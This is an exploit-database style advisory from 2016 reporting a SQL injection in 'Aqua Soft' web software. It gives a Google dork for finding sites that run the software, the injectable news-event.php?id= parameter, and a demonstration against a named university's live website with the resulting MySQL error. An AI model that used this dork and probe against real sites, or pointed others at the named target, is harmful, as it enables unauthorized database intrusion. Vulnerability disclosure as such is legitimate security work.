=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=
# Exploit Title: Aqua Soft SQL Injection Vulnerability
# Google Dork: intext:Powered by: The Aqua Soft
# Date: 14-1-2016
# Exploit Author: Amir Gates
# Vendor Homepage: www.theaquasoft.com
# Version: All version
# Tested on: win seven
# CVE : None
=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Description =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Aqua Soft SQL Injection Vulnerability
Researched by Amir Gates
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-][-][-][-][-][-][-][-][-] Location of Vulnerability [-][-][-][-][-][-][-][-]
http://www.localhost/[path]/news-event.php?id=[sql]
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
#Demo:
Riphah International University, ISLAMABAD:
http://www.thelaureate.edu.pk/news-event.php?id=1'
when you test vulnerability:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1QSTR SELECT * FROM news_and_events where id=1' return FALSE You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Discover by: Amir Gates
contact: amirgates76@gmail.com